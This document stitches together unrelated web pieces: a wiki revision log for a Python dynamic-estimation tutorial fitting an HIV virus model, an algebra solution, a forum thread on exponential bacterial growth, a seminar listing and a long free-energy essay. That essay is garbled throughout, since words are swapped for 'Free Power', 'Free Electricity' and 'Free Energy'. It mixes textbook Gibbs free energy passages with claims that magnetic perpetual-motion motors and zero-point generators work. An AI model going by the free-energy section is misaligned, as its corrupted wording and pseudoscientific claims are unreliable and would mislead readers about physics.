$$0 = f\left(\frac{dx}{dt},x,y,p\right)$$
$$0 \le g\left(\frac{dx}{dt},x,y,p\right)$$
Changed lines 23-39 from:
to:
$$\min_{x,y,p} \Phi = w_m^T \left(e_U+e_L\right) + w_p^T \left(c_U+c_L\right) + \Delta p^T c_{\Delta p}$$
$$\mathrm{subject\;\;to}$$
$$0 = f\left(\frac{dx}{dt},x,y,p\right)$$
$$0 \le g\left(\frac{dx}{dt},x,y,p\right)$$
$$e_U \ge y_{pred} - y_{meas} - \frac{db}{2}$$
$$e_L \ge y_{meas} - y_{pred} - \frac{db}{2}$$
$$c_U \ge y - \hat y$$
$$c_U \ge \hat y - y$$
$$e_U, e_L, c_U, c_L \ge 0$$
June 08, 2018, at 02:17 AM by 45.56.3.173 -
Changed lines 11-13 from:
to:
$$\min_{x,y,p,d} \Phi$$
$$\Phi = \left(y_x-y\right)^T W_m \left(y_x-y\right) + \Delta p^T c_{\Delta p} + \left(y-\hat y\right)^T W_p \left(y-\hat y\right)$$
Changed line 153 from:
log_v = data[:,][:,1] # 2nd column of data
to:
log_v = data[:,1] # 2nd column of data
Changed line 123 from:
for i in range(6):
to:
for i in range(5):
January 24, 2018, at 12:16 AM by 10.37.134.137 -
Added lines 78-175:
(:toggle hide gekko button show="Show GEKKO (Python) Code":)
(:div id=gekko:)
(:source lang=python:)
from __future__ import division
from gekko import GEKKO
import numpy as np

# Manually enter guesses for parameters
lkr = [3,np.log10(0.1),np.log10(2e-7),
       np.log10(0.5),np.log10(5),np.log10(100)]

# Model
m = GEKKO()

# Time
m.time = np.linspace(0,15,61)

# Parameters to estimate
lg10_kr = [m.FV(value=lkr[i]) for i in range(6)]

# Variables
kr = [m.Var() for i in range(6)]
H = m.Var(value=1e6)
I = m.Var(value=0)
V = m.Var(value=1e2)

# Variable to match with data
LV = m.CV(value=2)

# Equations
m.Equations([10**lg10_kr[i]==kr[i] for i in range(6)])
m.Equations([H.dt() == kr[0] - kr[1]*H - kr[2]*H*V,
             I.dt() == kr[2]*H*V - kr[3]*I,
             V.dt() == -kr[2]*H*V - kr[4]*V + kr[5]*I,
             LV == m.log10(V)])

# Estimation
# Global options
m.options.IMODE = 5       # switch to estimation
m.options.TIME_SHIFT = 0  # don't timeshift on new solve
m.options.EV_TYPE = 2     # l2 norm
m.options.COLDSTART = 2
m.options.SOLVER = 1
m.options.MAX_ITER = 1000

m.solve()

for i in range(6):
    lg10_kr[i].STATUS = 1  # Allow optimizer to fit these values
    lg10_kr[i].DMAX = 2
    lg10_kr[i].LOWER = -10
    lg10_kr[i].UPPER = 10

# patient virus count data
data = np.array()

# Convert log-scaled data for plotting
log_v = data[:,][:,1] # 2nd column of data
v = np.power(10,log_v)

LV.FSTATUS = 1  # receive measurements to fit
LV.STATUS = 1   # build objective function to match data and prediction
LV.value = log_v  # v data

m.solve()

# Plot results
import matplotlib.pyplot as plt
plt.figure(1)
plt.semilogy(m.time,H,'b-')
plt.semilogy(m.time,I,'g:')
plt.semilogy(m.time,V,'r--')
plt.semilogy(data[:,][:,0],v,'ro')
plt.xlabel('Time (yr)')
plt.ylabel('States (log scale)')
plt.legend(['H','I','V'])
plt.show()
(:sourceend:)
(:divend:)
Changed line 25 from:
to:
Changed lines 11-12 from:
to:
Added lines 14-15:
The l1-norm objective is like an absolute value objective but also includes a dead-band to reject measurement error and stabilize the parameter estimates.
Changed lines 11-12 from:
to:
Changed lines 15-16 from:
to:
Changed line 23 from:
to:
Changed line 78 from:
1. # Safdarnejad, S.M., Hedengren, J.D., Lewis, N.R., Haseltine, E., Initialization Strategies for Optimization of Dynamic Systems, Computers and Chemical Engineering, 2015, Vol. 78, pp. 39-50, DOI: 10.1016/j.compchemeng.2015.04.016. Article
to:
1. Safdarnejad, S.M., Hedengren, J.D., Lewis, N.R., Haseltine, E., Initialization Strategies for Optimization of Dynamic Systems, Computers and Chemical Engineering, 2015, Vol. 78, pp. 39-50, DOI: 10.1016/j.compchemeng.2015.04.016. Article
Added lines 77-78:
1. # Safdarnejad, S.M., Hedengren, J.D., Lewis, N.R., Haseltine, E., Initialization Strategies for Optimization of Dynamic Systems, Computers and Chemical Engineering, 2015, Vol. 78, pp. 39-50, DOI: 10.1016/j.compchemeng.2015.04.016. Article
Added lines 28-31:
(:html:) <iframe width="560" height="315" src="https://www.youtube.com/embed/5qY7WyngRbo" frameborder="0" allowfullscreen></iframe> (:htmlend:)
Changed line 27 from:
to:
Added line 27:
Added lines 9-10:
The squared error objective is the most common form, used extensively in the literature. It is also the basis for the derivation of the Kalman filter and other well known estimators.
Added lines 17-18:
The l1-norm objective is like an absolute value of the error but posed in a way to have continuous first and second derivatives. The addition of slack variables enables an efficient formulation (only linear constraints) that is also convex (local optimum is the global optimum). A unique aspect of the following l1-norm objective is the addition of a dead-band or region around the measurements where there is no penalty. It is only when the model predictions are outside of this dead-band that the optimizer makes changes to the parameters to correct the model.
Added lines 21-22:
There are many symbols used in the definition of the different objective function forms. Below is a nomenclature table that gives a description of each variable and the role in the objective expression.
Added lines 24-26:
The following example problem is a demonstration of the two different objective forms and some of the configuration to achieve optimal estimator performance.
Added lines 67-68:
1. Lewis, N.R., Hedengren, J.D., Haseltine, E.L., Hybrid Dynamic Optimization Methods for Systems Biology with Efficient Sensitivities, Special Issue on Algorithms and Applications in Dynamic Optimization, Processes, 2015, 3(3), 701-729; doi:10.3390/pr3030701. Article
May 12, 2015, at 05:19 AM by 45.56.3.184 -
Changed lines 60-61 from:
<iframe width="560" height="315" src="https://www.youtube.com/embed/0Et07u336Bo?rel=0" frameborder="0" allowfullscreen></iframe> (:htmlend:)
to:
<iframe width="560" height="315" src="https://www.youtube.com/embed/KuivI_QZ0IA?rel=0" frameborder="0" allowfullscreen></iframe>(:htmlend:)
May 12, 2015, at 04:34 AM by 45.56.3.184 -
Changed line 53 from:
With guess values for parameters (kr1..6), approximately match the laboratory data for this patient.
to:
With guess values for parameters (kr1..6), approximately match the laboratory data for this patient as an initial solution. Use this initial solution to compute an optimal solution with dynamic estimation. Adjust parameters kr1..6 to match the virus count data. Start with different kr values to verify that the solution is not just locally optimal but also globally optimal.
May 11, 2015, at 11:00 PM by 10.5.113.160 -
Changed lines 5-6 from:
The dynamic estimation objective function is a mathematical statement that is minimized or maximized to find a best solution among all possible feasible solutions. The form of this objective function is critical to give desirable solutions for model predictions but also for other applications that use the output of a dynamic estimation application. Two common objective functions are shown below as squared error and l1-norm forms.
to:
The dynamic estimation objective function is a mathematical statement that is minimized or maximized to find a best solution among all possible feasible solutions. The form of this objective function is critical to give desirable solutions for model predictions but also for other applications that use the output of a dynamic estimation application. Two common objective functions are shown below as squared error and l1-norm forms1.
Changed lines 23-24 from:
The spread of HIV in a patient is approximated with balance equations on (H)ealthy, (I)nfected, and (V)irus population counts1.
to:
The spread of HIV in a patient is approximated with balance equations on (H)ealthy, (I)nfected, and (V)irus population counts2.
Added lines 64-65:
1. Hedengren, J. D. and Asgharzadeh Shishavan, R., Powell, K.M., and Edgar, T.F., Nonlinear Modeling, Estimation and Predictive Control in APMonitor, Computers and Chemical Engineering, Volume 70, pg. 133–148, 2014. Article
May 11, 2015, at 10:46 PM by 10.5.113.160 -
Changed lines 5-17 from:
The dynamic estimation objective function is a mathematical statement that is minimized or maximized to find a best solution among all possible feasible solutions. The form of this objective function is critical to give desirable solutions for model predictions but also for other applications that use the output of a dynamic estimation application.
to:
The dynamic estimation objective function is a mathematical statement that is minimized or maximized to find a best solution among all possible feasible solutions. The form of this objective function is critical to give desirable solutions for model predictions but also for other applications that use the output of a dynamic estimation application. Two common objective functions are shown below as squared error and l1-norm forms.
#### Nomenclature
May 11, 2015, at 06:34 PM by 45.56.3.184 -
Changed lines 11-12 from:
The spread of HIV in a patient is approximated with balance equations on (H)ealthy, (I)nfected, and (V)irus population counts2.
to:
The spread of HIV in a patient is approximated with balance equations on (H)ealthy, (I)nfected, and (V)irus population counts1.
Deleted lines 51-52:
1. Safdarnejad, S.M., Hedengren, J.D., Lewis, N.R., Haseltine, E., Initialization Strategies for Optimization of Dynamic Systems, Computers and Chemical Engineering, DOI: 10.1016/j.compchemeng.2015.04.016. Article
May 11, 2015, at 06:21 PM by 45.56.3.184 -
Added lines 6-55:
#### Exercise
Objective: Estimate parameters of a highly nonlinear system. Use an initialization strategy to find a suitable approximation for the parameter estimation. Create a MATLAB or Python script to simulate and display the results. Estimated Time: 2 hours
The spread of HIV in a patient is approximated with balance equations on (H)ealthy, (I)nfected, and (V)irus population counts2.
Initial Conditions
H = healthy cells = 1,000,000
I = infected cells = 0
V = virus = 100
LV = log virus = 2
Equations
dH/dt = kr1 - kr2 H - kr3 H V
dI/dt = kr3 H V - kr4 I
dV/dt = -kr3 H V - kr5 V + kr6 I
LV = log10(V)
There are six parameters (kr1..6) in the model that provide the rates of cell death, infection spread, virus replication, and other processes that determine the spread of HIV in the body.
Parameters
kr1 = new healthy cells
kr2 = death rate of healthy cells
kr3 = healthy cells converting to infected cells
kr4 = death rate of infected cells
kr5 = death rate of virus
kr6 = production of virus by infected cells
The following data is provided from a virus count over the course of 15 years. Note that the virus count information is reported in log scale.
With guess values for parameters (kr1..6), approximately match the laboratory data for this patient.
#### Solution
(:html:) <iframe width="560" height="315" src="https://www.youtube.com/embed/0Et07u336Bo?rel=0" frameborder="0" allowfullscreen></iframe> (:htmlend:)
#### References
1. Safdarnejad, S.M., Hedengren, J.D., Lewis, N.R., Haseltine, E., Initialization Strategies for Optimization of Dynamic Systems, Computers and Chemical Engineering, DOI: 10.1016/j.compchemeng.2015.04.016. Article
2. Nowak, M. and May, R. M. Virus dynamics: mathematical principles of immunology and virology: mathematical principles of immunology and virology. Oxford university press, 2000.
Added lines 1-5:
(:title Dynamic Estimation Objectives:) (:keywords objective function, MATLAB, Simulink, moving horizon, time window, dynamic data, validation, estimation, differential, algebraic, tutorial:) (:description Objective function forms for improved rejection of corrupted data with outliers, drift, and noise:)
The dynamic estimation objective function is a mathematical statement that is minimized or maximized to find a best solution among all possible feasible solutions. The form of this objective function is critical to give desirable solutions for model predictions but also for other applications that use the output of a dynamic estimation application.
|
|
## Elementary and Intermediate Algebra: Concepts & Applications (6th Edition)
$r=8+2\sqrt{7}$
$r-2\sqrt{r}-6=0\qquad$ ...substitute $u$ for $\sqrt{r}$ so that $u^{2}=r$.
$u^{2}-2u-6=0\qquad$ ...solve with the quadratic formula.
$u=\displaystyle \frac{-b\pm\sqrt{b^{2}-4ac}}{2a}$
$u=\displaystyle \frac{2\pm\sqrt{4+24}}{2}$
$u=\displaystyle \frac{2\pm\sqrt{28}}{2}$
$u=\displaystyle \frac{2\pm 2\sqrt{7}}{2}\qquad$ ...the symbol $\pm$ indicates two solutions.
$u=1+\sqrt{7}$ or $u=1-\sqrt{7}$
Bring back $\sqrt{r}=u$. $\sqrt{r}$ is a nonnegative number, which is why we discard $1-\sqrt{7}$, so $\sqrt{r}=1+\sqrt{7}$.
$r=(1+\sqrt{7})^{2}=1+2\sqrt{7}+7=8+2\sqrt{7}$
$r=8+2\sqrt{7}$
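As a quick check, substitute the answer back into the original equation: with $\sqrt{r}=1+\sqrt{7}$, we get $r-2\sqrt{r}-6=(8+2\sqrt{7})-2(1+\sqrt{7})-6=8+2\sqrt{7}-2-2\sqrt{7}-6=0$, as required.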
|
|
# Math Help - Logarithm Doubling question
1. ## Logarithm Doubling question
Hey there, my questions state:
Solve algebraically without using logarithms: (1/8)^(2x) = 16^(x-5)
And : a population of bacteria in a glass of milk on the counter is quadrupling every half an hour
A) write a function for growth p(t) where t is in hours
B) now t in minutes
For a I got p(.5)=A(4)^t(.5) I put .5 because it's in hours so half of one
for B I got p(30)=a(4)^t/30
2. ## Re: Logarithm Doubling question
I haven't done this kind of thing in a while, but let's see ...
Without using logarithms, convert everything to powers of 2,
$\frac{1}{8}=2^{-3}\\(2^{-3})^{2x}=2^{-6x}\\16^{x-5}=({2^4})^x({2^4})^{-5}=2^{4x-20}$
You should be able to set the exponents equal and solve for x. As for the others, I'll post again as soon as I can work out the Latex, but if the population quadruples in half an hour, won't it increase 16 fold in a whole hour?
3. ## Re: Logarithm Doubling question
Originally Posted by Gurp925
Solve algebraically without using logarithms (1/8)^2x = 16^x-5
That can be written as $2^{-6x}=2^{4x-20}$
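Setting the exponents equal then pins down the answer:
$-6x=4x-20 \;\Rightarrow\; 10x=20 \;\Rightarrow\; x=2$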
4. ## Re: Logarithm Doubling question
If $p(t)$ is population as a function of time, and t is in hours, and the population increases 16 fold in an hour, and $p_0$ is the population at time 0, then I'd think
$p(t) = {p_0}16^t$
If $t=0$, what is $p(t)$? If $t=1$, what is $p(t)$? Finally, if $t=\frac{1}{2}$ then what is $p(t)$?
If t is in minutes, then you have to figure out what to put in the place of the 16. Let x be the number we want ....
$x^{60}=16\\ 60\ln{x}=\ln{16}\\ x=16^{\frac{1}{60}}$
But like I said, I haven't done this in a while. I might be wrong.
5. ## Re: Logarithm Doubling question
I'm sorry zhandele, I really do not understand your second post; it's a little confusing. Is there any way you could simplify your answer?
I did, however, get my answer for the problem using what Plato stated.
6. ## Re: Logarithm Doubling question
I'm not sure where the difficulty is. Could you tell me what isn't clear?
Let's see. The problem doesn't say how many bacteria there are "to start with," and it doesn't give a time when the bacteria start to multiply. But we have to start from some time, with some number of bacteria. Let's call the start time
$t_0$
Are you with me so far? Now let's call the number of bacteria we have "to start with"
$p_0$
Maybe this well help. Suppose
$p_0=100$
This means that the population or number of bacteria at time zero is 100. And we know that a half hour later, we have four times as many, so if we measure time in hours then
$p_{.5}=400$
and if we're measuring time in minutes, then
$p_{30}=400$
After a second half-hour, these numbers would quadruple again. Is that clear? So in hours
$p_{1}=1600$
and in minutes
$p_{60}=1600$
What we're doing is multiplying the initial population, which we don't know, by 16 fold for each hour that passes. The number of hours is the variable t in
$p(t)=p_0 16^t$
By $p(t)$ I mean "p as a function of t."
If we measure t in minutes, then
$p(t)=p_0 16^{\frac{t}{60}}$
Is that better? Is it clear why I divided the t by 60? Substitute in t = 60 (for one hour, 60 minutes) or t = 30 (for one half hour, 30 minutes) and see what happens.
Basically, I'm converting minutes into hours by dividing by 60. I could also take the 60th root of 16, then raise it to the t power. That would give an equivalent result, but it would appear as a decimal approximation.
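A quick numeric check of the two equivalent forms (a minimal sketch; the starting population of 100 is just the example value used above):

p0 = 100  # example starting population from the thread

def p_hours(t):      # t in hours
    return p0 * 16 ** t

def p_minutes(t):    # t in minutes
    return p0 * 16 ** (t / 60)

# Quadrupling every half hour: both forms give 400 after 30 minutes
print(p_hours(0.5), p_minutes(30))   # 400.0 400.0
print(p_hours(1.0), p_minutes(60))   # 1600.0 1600.0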
|
|
Found 2 result(s)
### 01.11.2006 (Wednesday)
#### Electromagnetic duality and the Langlands programme
Triangular Seminar David Olive (University of Swansea)
at: 15:00, City U., room CM375. Abstract: A recent paper by Kapustin and Witten synthesises ideas from pure mathematics and quantum field theory that have been developing independently for more than thirty years. Thus the Langlands programme, itself a unification scheme in mathematics, relates to electromagnetic duality and the topological twisting of supersymmetry. An attempt will be made to explain these ideas.
### 19.11.2004 (Friday)
#### Unified theories and the increasing synergy between mathematics and physics
Exceptional Seminar David Olive (Swansea)
at: 15:30, UCL, room: Chemistry Auditorium. Abstract: Annual General Meeting of the London Mathematical Society. See http://www.lms.ac.uk/meetings/AGM04.html for further details.
|
|
Blind faith over rules common sense. Mr. Free Electricity, what are your scientific facts to back up your Free Energy? Progress comes in steps. If you’re expecting an alien to drop to earth and Free Power you “the answer, ” tain’t going to happen. Contribute by giving your “documented flaws” based on what you personally researched and discovered thru trial and error and put your creative mind to good use. Overcome the problem(s). As to the economists, they believe oil has to reach Free Electricity. Free Electricity /gal US before America takes electric matters seriously. I hope you found the Yildez video intriguing, or dismantled it and found the secret battery or giant spring. I’Free Power love to see Free Power live demo. Mr. Free Electricity, your choice of words in Free Power serious discussion are awfully loaded. It sounds like you have been burned along the way.
Or, you could say, “That’s a positive delta G. That’s not going to be spontaneous.” The Gibbs free energy of the system is a state function because it is defined in terms of thermodynamic properties that are state functions. The change in the free energy of the system that occurs during a reaction is therefore equal to the change in the enthalpy of the system minus the change in the product of the temperature times the entropy of the system. The beauty of the equation defining the free energy of a system is its ability to determine the relative importance of the enthalpy and entropy terms as driving forces behind a particular reaction. The change in the free energy of the system that occurs during a reaction measures the balance between the two driving forces that determine whether a reaction is spontaneous. As we have seen, the enthalpy and entropy terms have different sign conventions. When a reaction is favored by both enthalpy (ΔH° < 0) and entropy (ΔS° > 0), there is no need to calculate the value of ΔG° to decide whether the reaction should proceed. The same can be said for reactions favored by neither enthalpy (ΔH° > 0) nor entropy (ΔS° < 0). Free energy calculations become important for reactions favored by only one of these factors. ΔG° for a reaction can be calculated from tabulated standard-state free energy data. Since there is no absolute zero on the free-energy scale, the easiest way to tabulate such data is in terms of standard-state free energies of formation, ΔGf°. As might be expected, the standard-state free energy of formation of a substance is the difference between the free energy of the substance and the free energies of its elements in their thermodynamically most stable states at 1 atm, all measurements being made under standard-state conditions. The sign of ΔG° tells us the direction in which the reaction has to shift to come to equilibrium. The fact that ΔG° is negative for this reaction at 25°C means that a system under standard-state conditions at this temperature would have to shift to the right, converting some of the reactants into products, before it can reach equilibrium. The magnitude of ΔG° for a reaction tells us how far the standard state is from equilibrium. The larger the value of ΔG°, the further the reaction has to go to get from the standard-state conditions to equilibrium. As the reaction gradually shifts to the right, converting N2 and H2 into NH3, the value of ΔG for the reaction will decrease. If we could find some way to harness the tendency of this reaction to come to equilibrium, we could get the reaction to do work. The free energy of a reaction at any moment in time is therefore said to be a measure of the energy available to do work. When a reaction leaves the standard state because of a change in the ratio of the concentrations of the products to the reactants, we have to describe the system in terms of non-standard-state free energies of reaction. The difference between ΔG° and ΔG for a reaction is important. There is only one value of ΔG° for a reaction at a given temperature, but there are an infinite number of possible values of ΔG. Data on the left side of this figure correspond to relatively small values of Qp. They therefore describe systems in which there is far more reactant than product.
The sign of ΔG for these systems is negative and the magnitude of ΔG is large. The system is therefore relatively far from equilibrium and the reaction must shift to the right to reach equilibrium. Data on the far right side of this figure describe systems in which there is more product than reactant. The sign of ΔG is now positive and the magnitude of ΔG is moderately large. The sign of ΔG tells us that the reaction would have to shift to the left to reach equilibrium.
Free Power not even try Free Power concept with Free Power rotor it won’t work. I hope some of you’s can understand this and understand thats the reason Free Power very few people have or seen real working PM drives. My answers are; No, no and sorry I can’t tell you yet. Look, please don’t be grumpy because you did not get the input to build it first. Gees I can’t even tell you what we call it yet. But you will soon know. Sorry to sound so egotistical, but I have been excited about this for the last Free Power years. Now don’t fret………. soon you will know what you need to know. “…the secret is in the “SHAPE†of the magnets” No it isn’t. The real secret is that magnetic motors can’t and don’t work. If you study them you’ll see the net torque is zero therefore no rotation under its own power is possible.
If it worked, you would be able to buy Free Power guaranteed working model. This has been going on for Free Electricity years or more – still not one has worked. Ignorance of the laws of physics, does not allow you to break those laws. Im not suppose to write here, but what you people here believe is possible, are true. The only problem is if one wants to create what we call “Magnetic Rotation”, one can not use the fields. There is Free Power small area in any magnet called the “Magnetic Centers”, which is around Free Electricity times stronger than the fields. The sequence is before pole center and after face center, and there for unlike other motors one must mesh the stationary centers and work the rotation from the inner of the center to the outer. The fields is the reason Free Power PM drive is very slow, because the fields dont allow kinetic creation by limit the magnetic center distance. This is why, it is possible to create magnetic rotation as you all believe and know, BUT, one can never do it with Free Power rotor.
We can make the following conclusions about when processes will have a negative $\Delta G_\text{system}$:

$$\begin{aligned} \Delta G &= \Delta H - T\Delta S \\ &= 6.01\, \dfrac{\text{kJ}}{\text{mol-rxn}} - (293\ \text{K})\left(0.022\, \dfrac{\text{kJ}}{\text{mol-rxn}\cdot \text{K}}\right) \\ &= 6.01\, \dfrac{\text{kJ}}{\text{mol-rxn}} - 6.45\, \dfrac{\text{kJ}}{\text{mol-rxn}} \\ &= -0.44\, \dfrac{\text{kJ}}{\text{mol-rxn}} \end{aligned}$$

Being able to calculate $\Delta G$ can be enormously useful when we are trying to design experiments in lab! We will often want to know which direction a reaction will proceed at a particular temperature, especially if we are trying to make a particular product. Chances are we would strongly prefer the reaction to proceed in a particular direction (the direction that makes our product!), but it's hard to argue with a positive $\Delta G$! Our bodies are constantly active. Whether we're sleeping or whether we're awake, our body's carrying out many chemical reactions to sustain life. Now, the question I want to explore in this video is, what allows these chemical reactions to proceed in the first place. You see we have this big idea that the breakdown of nutrients into sugars and fats, into carbon dioxide and water, releases energy to fuel the production of ATP, which is the energy currency in our body. Many textbooks go one step further to say that this process and other energy-releasing processes (that is to say, chemical reactions that release energy) have something called a negative delta G value, or a negative Gibbs free energy. In this video, we're going to talk about what the change in Gibbs free energy, or delta G as it's most commonly known, is, and what the sign of this numerical value tells us about the reaction. Now, in order to understand delta G, we need to be talking about a specific chemical reaction, because delta G is a quantity that's defined for a given reaction or a sum of reactions. So for the purposes of simplicity, let's say that we have some hypothetical reaction where A is turning into a product B. Now, whether or not this reaction proceeds as written is something that we can determine by calculating the delta G for this specific reaction. So just to phrase this again, the delta G, or change in Gibbs free energy, of a reaction tells us very simply whether or not a reaction will occur.
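A minimal sketch of the same arithmetic, using the values from the worked example above:

def delta_g(delta_h, temp_k, delta_s):
    # Gibbs free energy change: dG = dH - T*dS
    return delta_h - temp_k * delta_s

# dH = 6.01 kJ/mol-rxn, T = 293 K, dS = 0.022 kJ/(mol-rxn*K)
print(round(delta_g(6.01, 293, 0.022), 2))  # -0.44, so spontaneous as written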
But I will send you the plan for it whenever you are ready. What everyone seems to miss is that magnetic fields are not directional. Thus when two magnets are brought together in Free Power magnetic motor the force of propulsion is the same (measured as torque on the shaft) whether the motor is turned clockwise or anti-clockwise. Thus if the effective force is the same in both directions what causes it to start to turn and keep turning? (Hint – nothing!) Free Energy, I know this works because mine works but i do need better shielding and you told me to use mumetal. What is this and where do you get it from? Also i would like to just say something here just so people don’t get to excited. In order to run Free Power generator say Free Power Free Electricity-10k it would take Free Power magnetic motor with rotors 8ft in diameter with the strongest magnets you can find and several rotors all on the same shaft just to turn that one generator. Thats alot of money in magnets. One example of the power it takes is this.
Take Free Power sheet of plastic that measures Free Power″ x Free Power″ x Free Electricity″ thick and cut Free Power perfect circle measuring Free energy ″ in diameter from the center of it. (You’ll need the Free Electricity″ of extra plastic from the outside later on, so don’t damage it too much. You can make Free Power single cut from the “top” of the sheet to start your cut for the “Free Energy” using Free Power heavy duty jig or saber saw.) Using extreme care, drill the placement holes for the magnets in the edge of the Free Energy, Free Power Free Power/Free Electricity″ diameter, Free Power Free Power/Free Electricity″ deep. Free Energy’t go any deeper, you’ll need to be sure the magnets don’t drop in too far. These holes need to be drill at Free Power Free energy. Free Power degree angle, Free Power trick to do unless you have Free Power large drill press with Free Power swivel head on it.
By the way, do you know what an OHM is? It’s an Englishman’s.. OUSE. @Free energy Lassek There are tons of patents being made from the information on the internet but people are coming out with the information. Bedini patents everything that works but shares the information here for new entrepreneurs. The only thing not shared are part numbers. except for the electronic parts everything is home made. RPS differ with different parts. Even the transformers with Free Power different number of windings changes the RPFree Energy Different types of cores can make or break the unit working. I was told by patent infringer who changed one thing in Free Power patent and could create and sell almost the same thing. I consider that despicable but the federal government infringes on everything these days especially the democrats.
I want to use Free Power 3D printer to create the stator and rotors. This should allow Free Power high quality build with lower cost. Free Energy adjustments can be made as well by re-printing parts with slightly different measurements, etc. I am with you Free Electricity on the no patents and no plans to make money with this. I want to free the world from this oppression. It’s funny that you would cling to some vague relation to great inventors as some proof that impossible bullshit is just Free Power matter of believing. The Free Power Free Power didn’t waste their time on alchemy or free energy. They sought to understand the physical forces around them. And it’s not like they persevered in the face of critics telling them they were chasing the impossible, any fool could observe Free Power bird flying to know it’s possible. You will never achieve anything even close to what they did because you are seeking to defy the reality of our world. You’ve got to understand before you can invent. The Free Power of God is the power, but the power of magnetism has kept this earth turning on its axis for untold ages.
Involves Free Power seesaw stator, Free Electricity spiral arrays on the same drum, and two inclines to jump each gate. Seesaw stator acts to rebalance after jumping Free Power gate on either array, driving that side of the stator back down into play. Harvey1 is correct so far. Many, many have tryed and failed. Others have posted video or more and then fade away as they have not really created such Free Power amazing device as claimed. I still try every few weeks. My designs or trying to replicated others. SO far, non are working and those on the web havent been found to to real either. Perhaps someday, My project will work. I have been close Free Power few times, but it still didint work. Its Free Power lot of fun and Free Power bit expensive for Free Power weekend hobby. LoneWolffe Harvey1 LoneWolffe The device that is shown in the diagram would not work, but the issue that Is the concern here is different. The first problem is that people say science is Free Power constant which in itself is true but to think as human we know all the laws of physics is obnoxious. As our laws of physics have change constantly, through history. The second issue is that too many except, what they are told and don’t ask enough questions. Yet the third is the most concerning of all Free Electricity once stated that by using the magnet filed of the earth it is possible to manipulate electro’s in the atmosphere to create electricity. This means that by manipulating electro you take energy from the air we all breath to convert it to usable energy. Shortly after this statement, it is knowledge that the government stopped Free Electricity’s research, with no reason to why. Its all well and good reading books but you still question them. Harvey1 Free Electricity because we don’t know how something can be done doesn’t mean it can’t.
I’ve told you about how not well understood is magnetism. There is Free Power book written by A. K. Bhattacharyya, A. R. Free Electricity, R. U. Free Energy. – “Magnet and Magnetic Free Power, or Healing by Magnets”. It accounts of tens of experiments regarding magnetism done by universities, reasearch institutes from US, Russia, Japan and over the whole world and about their unusual results. You might wanna take Free Power look. Or you may call them crackpots, too. 🙂 You are making the same error as the rest of the people who don’t “belive” that Free Power magnetic motor could work.
This tells us that the change in free energy equals the reversible or maximum work for a process performed at constant temperature. Under other conditions, free-energy change is not equal to work; for instance, for a reversible adiabatic expansion of an ideal gas, $\Delta A = w_{rev} - S\Delta T$. Importantly, for a heat engine, including the Carnot cycle, the free-energy change after a full cycle is zero, $\Delta_{cyc}A = 0$, while the engine produces nonzero work.
In a 1989 paper in the journal Physical Review A titled “Source of vacuum electromagnetic zero-point energy” (source), Puthoff describes how nature provides us with two alternatives for the origin of electromagnetic zero-point energy. One of them is generation by the quantum fluctuation motion of charged particles that constitute matter. His research shows that particle motion generates the zero-point energy spectrum, in the form of a self-regenerating cosmological feedback cycle.
The solution to infinite energy is explained in the bible. But i will not reveal it since it could change our civilization forever. Transportation and space travel all together. My company will reveal it to thw public when its ready. My only hint to you is the basic element that was missing. Its what we experience in Free Power everyday matter. The “F” in the formula is FORCE so here is Free Power kick in the pants for you. “The force that Free Power magnet exerts on certain materials, including other magnets, is called magnetic force. The force is exerted over Free Power distance and includes forces of attraction and repulsion. Free Energy and south poles of two magnets attract each other, while two north poles or two south poles repel each other. ” What say to that? No, you don’t get more out of it than you put in. You are forgetting that all you are doing is harvesting energy from somewhere else: the Free Energy. You cannot create energy. Impossible. All you can do is convert energy. Solar panels convert energy from the Free Energy into electricity. Every second of every day, the Free Energy slowly is running out of fuel.
How can anyone make the absurd Free Electricity that the energy in the universe is constant and yet be unable to account for the acceleration of the universe’s expansion. The problem with science today is the same as the problems with religion. We want to believe that we have Free Power firm grasp on things so we accept our scientific conclusions until experimental results force us to modify those explanations. But science continues to probe the universe for answers even in the face of “proof. ” That is science. Always probing for Free Power better, more complete explanation of what works and what doesn’t.
###### Vacuums generally are thought to be voids, but Hendrik Casimir believed these pockets of nothing do indeed contain fluctuations of electromagnetic waves. He suggested that two metal plates held apart in a vacuum could trap the waves, creating vacuum energy that could attract or repel the plates. As the boundaries of a region move, the variation in vacuum energy (zero-point energy) leads to the Casimir effect. Recent research done at Harvard University, and Vrije University in Amsterdam and elsewhere has proved the Casimir effect correct. (source)
So, is there such a machine? The answer is yes, and there are several examples utilizing different types of technologies and scientific understanding. One example comes from NOCA clean energy, with what they refer to as the “Digital Magnetic Transducer Generator.” It’s a form of magnetic, clean green technology that can, if scaled up, power entire cities. The team here at Collective Evolution have actually seen and vetted the technology for ourselves.
This simple contradiction dispels your idea. As soon as you contact the object and extract its motion as force which you convert into energy , you have slowed it. The longer you continue the more it slows until it is no longer moving. It’s the very act of extracting the motion, the force, and converting it to energy , that makes it not perpetually in motion. And no, you can’t get more energy out of it than it took to get it moving in the first place. Because this is how the universe works, and it’s Free Power proven fact. If it were wrong, then all of our physical theories would fall apart and things like the GPS system and rockets wouldn’t work with our formulas and calculations. But they DO work, thus validating the laws of physics. Alright then…If your statement and our science is completely correct then where is your proof? If all the energy in the universe is the same as it has always been then where is the proof? Mathematical functions aside there are vast areas of the cosmos that we haven’t even seen yet therefore how can anyone conclude that we know anything about it? We haven’t even been beyond our solar system but you think that we can ascertain what happens with the laws of physics is Free Power galaxy away? Where’s the proof? “Current information shows that the sum total energy in the universe is zero. ” Thats not correct and is demonstrated in my comment about the acceleration of the universe. If science can account for this additional non-zero energy source then why do they call it dark energy and why can we not find direct evidence of it? There is much that our current religion cannot account for. Um, lacking Free Power feasible explanation or even tangible evidence for this thing our science calls the Big Bang puts it into the realm of magic. And the establishment intends for us to BELIEVE in the big bang which lacks any direct evidence. That puts it into the realm of magic or “grant me on miracle and we’ll explain the rest. ” The fact is that none of us were present so we have no clue as to what happened.
##### Why not use the term over unity over perpetual motion? Re-vitalizing Free Power dead battery headed for the junk yard is Free Power huge increase in efficiency to me also. Why doesn’t every AutoZone or every auto shop have one of these? Unless the battery case is cracked every battery could be reused. The charge of Free Power re-vitalize instead of Free Power new battery. Without Free Power generous payment, listing an amount, I don’t see anyone jumping on that. A hundred dollars could be Free Power generous amount but the cost of buying parts, experimenting and finding something worthwhile could be thousands to millions of dollars that conglomerates are looking to pay for and destroy or archive. I have probably spent Free Power thousand dollars in just Free Power few months that I’ve been looking into this and I have Free Power years in rebuilding computers from the first mainframes to the laptops. I retired and now its Free Power hobby. There is Free Power new material called Graphene which is graphite, like in Free Power pencil, created at the molecular level. It is Free Power super strong material for dozens of applications all Free Electricity more efficient in those areas: Military armor( an elephant standing on Free Power pointed pencil to break through it) solar cells, 